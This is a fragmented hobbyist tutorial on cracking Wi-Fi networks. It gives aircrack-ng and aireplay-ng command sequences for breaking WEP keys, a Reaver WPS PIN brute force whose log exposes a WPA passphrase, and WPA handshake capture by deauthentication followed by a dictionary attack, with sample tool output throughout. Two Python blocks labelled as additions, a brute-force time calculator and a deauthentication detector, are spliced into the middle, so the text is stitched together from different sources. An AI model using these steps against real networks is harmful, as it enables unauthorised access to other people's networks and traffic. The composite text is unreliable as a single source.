n00Bs Wifi Cracking

JLR n00b D0X Presents: Wifi Cracking

Notes from the author:
In the beginning of wifi communication, WEP (Wired Equivalent Protection) was the only encryption a wireless network user had to choose from. At the time that was great, because no tools existed to break it. However, less than a year after WiFi became mainstream, tools began to emerge that made cracking WEP encryption possible. The first tools were command line and could take a very long time to crack. Nowadays WEP and WPS (Wireless Protected Setup) have become 100% crackable: WEP takes only minutes most times and WPS anywhere from a few seconds to a day or two. The only standing security for “consumer” Wifi now falls to WPA/WPA2 (Wireless Protected Access). However, even that can be cracked IF you have what it takes.

What the black and green?
Well you see, when I was a young kid, the first thing I learned was HTML. And the very first website I made was black background with lime green text. It was hard for even me to read. So I decided my n00b D0X would be written in this way as sort of payment for all the n00bs too lazy to do a simple web search.

OK GET ON WITH IT!
Ok, let's move on to the D0X.



Transcript of n00Bs Wifi Cracking

Get used to it now, and life will be easier later:
First of all you're going to need to use LINUX! Yes, that OS you think is only for programmers and developers and hard core hackers. In fact it's easier to get started using Linux now so later on you don't have to worry about hassling with how things work to perform your pentest or attacks. The up side is that many very robust tools (and some argue the BEST tools) exist for Linux based operating systems. So grab one of those “fancy hacking” distros like Backtrack or Kali and get used to using it. Don't worry about running any exploits or W1f1 hack3rs here.

TOOLS NEEDED:
All these tools are already installed on Backtrack / Kali Linux but they can also be installed on other Linux distros.
Aircrack-NG suite
tcpreplay (usually included with most Linux distros)
macchanger (https://github.com/alobbs/macchanger)
Reaver / Wash (https://code.google.com/p/reaver-wps/)
Pyrit (http://code.google.com/p/pyrit/)
oclhashcat+ (http://hashcat.net/oclhashcat-plus/)
cowpatty (http://wirelessdefence.org/Contents/coWPAttyMain.htm)
crunch (http://sourceforge.net/pro[…]

[…]:37  Trying directed probe requests...
09:23:37  00:11:22:33:44:55 - channel: 9 - 'HackMe'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%

The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then in[…]

[…]3:44:55 -w output wlan0
Where:
-c 9 is the channel for the wireless network
--bssid 00:11:22:33:44:55 is the access point MAC address. This eliminates extraneous traffic.
-w output is the file name prefix for the file which will contain the IVs.
wlan0 is the interface name.

While the in[…]

[…]3:44:55   42 100     5240   178307   338   9  54  WEP  WEP         HackMe

BSSID              STATION            PWR  Lost  Packets  Probes

00:11:22:33:44:55  00:0F:B5:88:AC:82   42     0   183782

Step 4 - Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet the source MAC address must already be associated. If the source MAC address you are in[…]

[…]3:44:55 -h 00:0F:B5:88:AC:82 wlan0
Where:
6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive packets to be sent.
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.

Success looks like:
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
… and so on.

Here is an example of what a failed authentication looks like:
18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request

Notice the “Got a deauthentication packet” and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.

Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem use the following command while trying to do fake authentication. Start another session and… Run:
tcpdump -n -vvv -s0 -e -i <interface name> | grep -i -E "(RA:<MAC address of your card>|Authentication|ssoc)"
You would then look for error messages.

If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and… Run:
tcpdump -n -e -s0 -vvv -i wlan0
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:11:22:33:44:55) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning the AP will not process or accept the in[…]

[…]:44:55 -h 00:0F:B5:88:AC:82 wlan0
It will start listening for ARP requests and when it hears one aireplay-ng will immediately start to in[…]

[…]00 to 400 data packets per second. It can be as low as 100/second and as high as 500/second.

Troubleshooting Tips
If you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?” this means you have lost association with the AP. All your in[…]

[…]) and successfully associate with the AP.

Step 6 - Run aircrack-ng to obtain the WEP key
The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Note: For learning purposes you should use a 64 bit WEP key on your AP to speed up the cracking process. If this is the case then you can include ”-n 64” to limit the checking of keys to 64 bits.
Two methods will be shown. It is recommended you try both for learning purposes.
By trying both methods you will quickly see that the PTW method determines the WEP key far faster than the FMS/KoreK method. As a reminder, the PTW method only works successfully with ARP request/reply packets. Since this tutorial covers in[…]

[…]3:44:55 output*.cap
Where:
-b 00:11:22:33:44:55 selects the one access point we are interested in. This is optional since when we originally captured the data we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with “output” and ending in ”.cap”.

To also use the FMS/KoreK method, start another console session and enter:
aircrack-ng -K -b 00:11:22:33:44:55 output*.cap
Where:
-K invokes the FMS/KoreK method
-b 00:11:22:33:44:55 selects the one access point we are interested in. This is optional since when we originally captured the data we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with “output” and ending in ”.cap”.
If you are using 1.0-rc1 add the option ”-K” for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.)

You can run this while generating packets. In a short time the WEP key will be calculated and presented. You will need approximately 250000 IVs for 64 bit and 1500000 IVs for 128 bit keys. If you are using the PTW attack then you will need about 20000 packets for 64-bit and 40000 to 85000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key. When in doubt collect as many as possible first.

Here is what success looks like:
Aircrack-ng 0.9

                [00:03:06] Tested 674449 keys (got 96610 IVs)

   KB    depth   byte(vote)
    0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
    1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
    2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
    3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

             KEY FOUND! [ 12:34:56:78:90 ]
        Probability: 100%

Notice that in this case it took far less than the estimated 250000 IVs to crack the key. (For this example the FMS/KoreK attack was used.)

General Troubleshooting
Be sure to read all the documentation on the Wiki for the various commands used in this tutorial.
See Tutorial: I am in[…]

[…] is not being used then “ping 192.168.1.13”. This will cause an ARP to be broadcast via your wireless access point and in turn this will kick off the rein[…]

[…]3:44:55
[+] Switching mon0 to channel 4
[+] Associated with 00:11:22:33:44:55 (ESSID: HackMe)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
…...... 4+ hours later …............
[+] Trying pin 92390942
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in ------
[+] WPS PIN: '92390942'
[+] WPA PSK: 'ub3r1337'
[+] AP SSID: 'HackMe'
[+] Nothing done, nothing to save.

As you can see reaver attempted almost all possible keys before it found the one for our wireless network.
Here we see our pin is 92390942
We see the WPA Passphrase is ub3r1337
The great thing (or bad) about reaver is that it keeps logs of every wireless network you attack. This means that if the Passphrase changes all you need to do is re-run reaver and in a few seconds you'll have the new PSK. Simple right?

Depending on how strong the signal is (you can determine this by using the packet in[…]

[…] characters in length it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length.
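The paragraph above argues that a pre-shared key only falls to a dictionary word or a short passphrase, and the next paragraph puts the CPU rate at 50 to 300 candidate keys per second. The following is an added example, not code from the original document, that turns those figures into a small brute-force time calculator so a defender can see why a long random WPA/WPA2 passphrase is out of reach. The character-set sizes, the sample passphrase lengths and the 1,000,000-entry wordlist size are assumptions chosen for the demonstration; the 8 to 63 character limit is the WPA passphrase length limit.

```python
# Added example (not from the original document): brute-force time estimates
# for WPA/WPA2 pre-shared keys at the page's stated 50-300 keys/second.
from math import log10

# Assumed alphabets a passphrase might be drawn from.
CHARSET_SIZES = {
    "digits": 10,            # 0-9 (PIN-style passphrases)
    "lowercase": 26,         # a-z
    "alphanumeric": 62,      # a-z, A-Z, 0-9
    "printable_ascii": 95,   # letters, digits and special symbols
}

SECONDS_PER_YEAR = 365 * 24 * 3600

# WPA/WPA2 passphrases must be 8 to 63 characters long.
MIN_PSK_LEN, MAX_PSK_LEN = 8, 63


def keyspace(charset: str, length: int) -> int:
    """Number of distinct passphrases of exactly `length` characters."""
    if not MIN_PSK_LEN <= length <= MAX_PSK_LEN:
        raise ValueError(f"passphrase length must be {MIN_PSK_LEN}..{MAX_PSK_LEN}")
    return CHARSET_SIZES[charset] ** length


def worst_case_seconds(charset: str, length: int, keys_per_second: float) -> float:
    """Seconds needed to try every candidate in the keyspace at the given rate."""
    return keyspace(charset, length) / keys_per_second


def expected_years(charset: str, length: int, keys_per_second: float) -> float:
    """Average search time (half the keyspace on average) expressed in years."""
    return worst_case_seconds(charset, length, keys_per_second) / 2 / SECONDS_PER_YEAR


def wordlist_seconds(wordlist_size: int, keys_per_second: float) -> float:
    """Worst case for the dictionary attack the page describes: the key is only
    found if it is in the list, and every entry may have to be tried."""
    return wordlist_size / keys_per_second


def summary(keys_per_second: float = 300.0) -> dict:
    """Compare an 8-digit PIN-style PSK, 8 random printable characters, and the
    page's recommendation of 63 random printable characters (log10 of years,
    because the plain number does not fit on a line)."""
    return {
        "digits_8_years": expected_years("digits", 8, keys_per_second),
        "printable_8_years": expected_years("printable_ascii", 8, keys_per_second),
        "printable_63_log10_years": log10(expected_years("printable_ascii", 63, keys_per_second)),
        "wordlist_1M_hours": wordlist_seconds(1_000_000, keys_per_second) / 3600,
    }


if __name__ == "__main__":
    # Assumed rate: the upper end of the page's 50-300 keys/second range.
    for name, value in summary(300.0).items():
        print(f"{name}: {value:,.3f}")
```

Run it at 50 keys/second as well as 300 and the ordering does not change: an 8-digit passphrase is exhausted in hours, 8 random printable characters takes on the order of hundreds of thousands of years on one CPU, and 63 random characters is beyond any multiple of that rate. The wordlist figure is the only one a defender controls by policy: a passphrase that is not in any wordlist is never found by the dictionary attack at all.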
Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. The impact of having to use a brute force approach is substantial. Because it is very compute intensive a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours if not days to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

IMPORTANT: This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them, so the techniques you use are identical. It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point please remember to get permission from the owner prior to playing with it. I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool. Please send me any constructive feedback positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions
First, this solution assumes:
You are using drivers patched for in[…]

[…]6 48 54Mbit are 'g'. Sometimes you also need to set the monitor-mode card to the same speed: auto, 1MB, 2MB, 11MB, 54MB, etc.
Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying ”-c <channel of AP>” when you start airodump-ng.
Be sure there are no connection managers running on your system. These can change channels and/or change mode without your knowledge.
You are physically close enough to receive both access point and wireless client packets. The wireless card strength is typically less than the AP strength. Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close.
Make sure to use the drivers specified on the wiki. Depending on the driver some old versions do not capture all packets.
Ideally connect and disconnect a wireless client normally to generate the handshake.
If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back then the client did not “hear” the deauthentication packet.
Try stopping the radio on the client station then restarting it.
Make sure you are not running any other program/process that could interfere such as connection managers, Kismet, etc.
Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem, such as missing AP packets, missing client packets, etc.
Unfortunately sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. The point is, if you don't get it the first time, have patience and experiment a bit. It can be done!
Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a “normal” WPA connection looks like. As well, see the FAQ for detailed information on how to use Wireshark.
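The tips above describe the handshake-capture technique as a single, directed deauthentication frame and suggest tcpdump for checking what was actually sent; the same frames are what a defender's monitor sees. The following is an added example, not code from the original document, that reads tcpdump-style 802.11 lines in the format quoted in the troubleshooting tips earlier on this page and raises an alert for the two things a wireless intrusion detection system keys on: a burst of deauthentication/disassociation frames against one station, and any deauthentication addressed to the broadcast address. The log lines are constructed for the demonstration (the MAC addresses are the page's sample values 00:11:22:33:44:55 and 00:0F:B5:88:AC:82), and the window and threshold values are assumptions to tune per network.

```python
# Added example (not from the original document): flag deauthentication
# bursts and broadcast deauths in tcpdump-style 802.11 monitor output.
import re
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Line shape: "<time> <duration> BSSID:<mac> DA:<mac> SA:<mac> <subtype>: <reason>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+\S+\s+"
    r"BSSID:(?P<bssid>[0-9a-fA-F:]{17})\s+"
    r"DA:(?P<da>[0-9a-fA-F:]{17})\s+"
    r"SA:(?P<sa>[0-9a-fA-F:]{17})\s+"
    r"(?P<subtype>DeAuthentication|Disassociation)"
)

# Constructed sample capture: one isolated deauth (normal), a probe response
# (ignored), then four directed deauths inside one second followed by a
# broadcast deauth, all claiming to come from the AP's address.
SAMPLE_LOG = """\
11:04:34.360700 314us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
11:05:09.500000 44us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 Probe Response (HackMe)
11:05:10.000100 314us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 DeAuthentication: Previous authentication no longer valid
11:05:10.300000 314us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 DeAuthentication: Previous authentication no longer valid
11:05:10.600000 314us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 DeAuthentication: Previous authentication no longer valid
11:05:10.900000 314us BSSID:00:11:22:33:44:55 DA:00:0F:B5:88:AC:82 SA:00:11:22:33:44:55 DeAuthentication: Previous authentication no longer valid
11:05:11.200000 314us BSSID:00:11:22:33:44:55 DA:ff:ff:ff:ff:ff:ff SA:00:11:22:33:44:55 DeAuthentication: Previous authentication no longer valid
"""


def _to_seconds(ts: str) -> float:
    """Convert HH:MM:SS.ffffff into seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_frames(text: str) -> list:
    """Keep only deauthentication/disassociation lines, as dicts with lowercase MACs."""
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frames.append({
                "t": _to_seconds(m["ts"]),
                "bssid": m["bssid"].lower(),
                "da": m["da"].lower(),
                "sa": m["sa"].lower(),
                "subtype": m["subtype"],
            })
    return frames


def find_deauth_bursts(frames: list, window_s: float = 2.0, threshold: int = 3) -> list:
    """Alert when one (SA, BSSID) pair sends `threshold` or more deauth/disassoc
    frames within `window_s` seconds (once per pair), and on any broadcast deauth."""
    alerts = []
    recent = defaultdict(deque)   # (sa, bssid) -> timestamps inside the window
    already_reported = set()
    for f in frames:
        if f["da"] == BROADCAST:
            alerts.append({"kind": "broadcast", "sa": f["sa"], "bssid": f["bssid"],
                           "t": f["t"], "count": 1})
        key = (f["sa"], f["bssid"])
        q = recent[key]
        q.append(f["t"])
        while q and f["t"] - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and key not in already_reported:
            already_reported.add(key)
            alerts.append({"kind": "burst", "sa": f["sa"], "bssid": f["bssid"],
                           "t": f["t"], "count": len(q)})
    return alerts


if __name__ == "__main__":
    for alert in find_deauth_bursts(parse_frames(SAMPLE_LOG)):
        print(f"{alert['kind']:9s} sa={alert['sa']} bssid={alert['bssid']} "
              f"count={alert['count']} t={alert['t']:.3f}s")
```

The single "Class 3 frame" deauth at 11:04:34 is the normal housekeeping message the page quotes and produces no alert; the four directed frames within one second trip the burst rule on the third, and the broadcast frame is reported on its own regardless of rate. Feeding the detector `tcpdump -n -e -s0 -vvv -i <monitor interface>` output from a card kept on the AP's channel, as the page's own troubleshooting commands do, gives a minimal deauth-flood monitor for a home or lab network.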
In an ideal world you should use a wireless device dedicated to capturing the packets. This is because some drivers, such as the RTL8187L driver, do not capture packets the card itself sends.
Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers, such as the RT73 driver, did not capture client packets.
When using Wireshark the filter “eapol” will quickly display only the EAPOL packets. Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets.
To dig deep into the packet analysis you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not […]

[…]r n00b, you might be wondering if a graphic point and click way exists to do all of the above. The answer is “YES”, and am I going to explain it here? NO. WHY? Because they are point and click interfaces to the above tools: if you understand the command line ways of attacking wifi you won't have any issues cracking using a GUI.
I hope you en[…]